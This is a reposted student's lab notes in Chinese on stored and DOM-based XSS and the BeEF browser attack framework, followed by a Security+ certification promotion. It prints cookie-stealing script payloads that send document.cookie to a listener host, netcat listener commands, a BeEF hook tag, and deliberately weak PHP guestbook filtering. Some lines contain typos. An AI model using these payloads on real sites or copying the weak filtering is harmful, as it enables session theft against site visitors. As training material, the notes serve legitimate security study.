【安全牛学员笔记】存储型XSS和BEEF浏览器攻击框架
来源:互联网 发布:梨园淘宝城贵吗 编辑:程序博客网 时间:2024/06/05 18:35
存储型XSS
长期存储于服务器端
每次用于访问都会被执行javascript脚本
Name:客户端表单长度限制
客户端、截断代理
<script src=http://1.1.1.1/a.js></script>
a.js源码
var img = new Image();
img.src = "http://1.1.1.1:88/cookies.php?cookie="+documnet.cookie;
root@R:~# netstat -pantu | grep 80
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN 771/gsad
tcp 0 0 192.168.1.102:34212 140.98.195.27.80 ESTABLISHED 2840/wget
tcp6 0 127.0.0.1:8080 :::* LISTEN 2387/java
root@R:~# kill 771
root@R:~# service apache2 start
root@R:~# cd /var/www/html/
root@R:/var/www/html# gedit a.js
var img = new Image();
img.src = "http://192.168.1.102:88/cookies.php?cookie="+documnet.cookie;
root@R:~# nc -nlvp 88
----------------------------------------------------------------------
低安全代码
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mixMessage']);
$name = trim($_POST['txtName]);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
// Sanitize name input
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>
---------------------------------------------------------------------------
中安全代码
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mixMessage']);
$name = trim($_POST['txtName]);
// Sanitize message input
$message = trim(strip_tags(addslashed($message)));
$message = mysql_real_escape_string($message);
$message = htmlspecialchars($message);
// Sanitize name input
$name = str_replace('<script>','',$name);
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>
----------------------------------------------------------------------------------
高安全代码
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mixMessage']);
$name = trim($_POST['txtName]);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
$message = htmlspecialchars($message);
// Sanitize name input
$name = str_replace('<script>','',$name);
$name = mysql_real_escape_string($name);
$name = htmlspecialchars($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>
----------------------------------------------------------------------------------
XSS
DOM型XSS
一套JS和其他语言可调用的标准的API
Page Document objedct
Element1 Obj1
Element2 Obj2 ┌Properties─Value┬Get
│ └Set
Element3 Obj3─┼Methods─Action┬Add
│ └Del
└Event
XSS
DOM型XSS
<script>var
img=document.createElememt("img");img.src="http://192.168.1.102:88/log
?"+escape(document.cookie);</script>
root@R:~# vi 1
<script>var img=document.createElememt("img");img.src="http://192.168.1.102:88/log?"+escape(document.cookie);</script>
root@R:~# nc -nlvp 88
BEEF
浏览器攻击面
应用普遍转移到B/S架构,浏览器成为统一客户端程序
结合社会工程学方法对浏览器进行攻击
攻击浏览器用户
通过注入的JS脚本,利用浏览器攻击其他网站
Beff(Brower exploitation framework)
生成、交付palyload
Ruby语言编写
服务器端:管理hooked客户端
客户端:运行与客户端浏览器的Javascript脚本(hook)
BEEF
攻击手段
利用网站xss漏洞实现攻击
诱使客户端访问含有hook的伪造站点
结合中介人攻击注入hook脚本
常见用途
键盘记录器
网盘扫描
浏览器信息收集
绑定shell
与metasploit集成
BEEF
演示页面:http://<IP_BeEF_Server>:3000/demos/basic.html
Details:
浏览器、插件版本信息;操作系统信息
Logs:
浏览器工作:焦点变化、鼠标点击、信息输入
Commands:命令模块
绿色模块:表示模块适合目标浏览器,并且执行结果被客户端不可见
红色模块:表示模块不适用于当前用户,有些红色模块也可正常执行
橙色模块:模块可用,但结果对用户可见(CAM弹窗申请权限等)
灰色模块:模块末在目标浏览器上测试过
beef xss framework
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
192.168.1.102:3000/hook.js
BEEF
主要模块
Browsers
Exploits
Host
Persistence
Network
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
- 【安全牛学员笔记】存储型XSS和BEEF浏览器攻击框架
- 【安全牛学习笔记】存储型XSS和BEEF浏览器攻击框架
- XSS框架之安装BEEF
- 【安全牛学习笔记】XSS-简介、跨站脚本检测和常见的攻击利用手段
- 【安全牛学习笔记】XSS-简介、跨站脚本检测和常见的攻击利用手段
- 【安全牛学习笔记】反射型XSS攻击漏洞的原理及解决办法
- WEB安全之XSS和CRSF攻击
- 网站安全-前端XSS攻击和防御
- 浏览器利用框架BeEF测试
- 【安全牛学习笔记】XSS- 键盘记录器和反射型XSS
- 【安全牛学习笔记】XSS- 键盘记录器和反射型XSS
- XSS学习笔记(二)(存储型XSS,持久型攻击)
- XSS学习笔记(二)(存储型XSS,持久型攻击)
- web安全 xss攻击
- 看好你的门-常用WEB安全术语(6)-存储型XSS攻击
- 【安全牛学习笔记】存储型XSS漏洞原理及修复方法
- XSS存储型攻击的末日
- web安全之Xss攻击和Sql注入
- Python笔记——几种数据结构的实现:栈、队列及二叉树
- 1 、分布式系统概述
- 手机适配时间控件
- 使用cas登录出错,本地没有错误,环境上报错
- 生成式模型 & 生成对抗网络——资料梳理(专访资料 + 论文分类)
- 【安全牛学员笔记】存储型XSS和BEEF浏览器攻击框架
- 对Java多线程得了解
- 81. Search in Rotated Sorted Array II
- 关于 input 输入搜索的优化
- JAVA SE — Day 17
- PAT考试乙级1049(C语言实现)
- JQuery对象与Dom对象初次入坑
- Porting a Driver from UMDF 1 to UMDF 2
- Tensorflow的应用(一)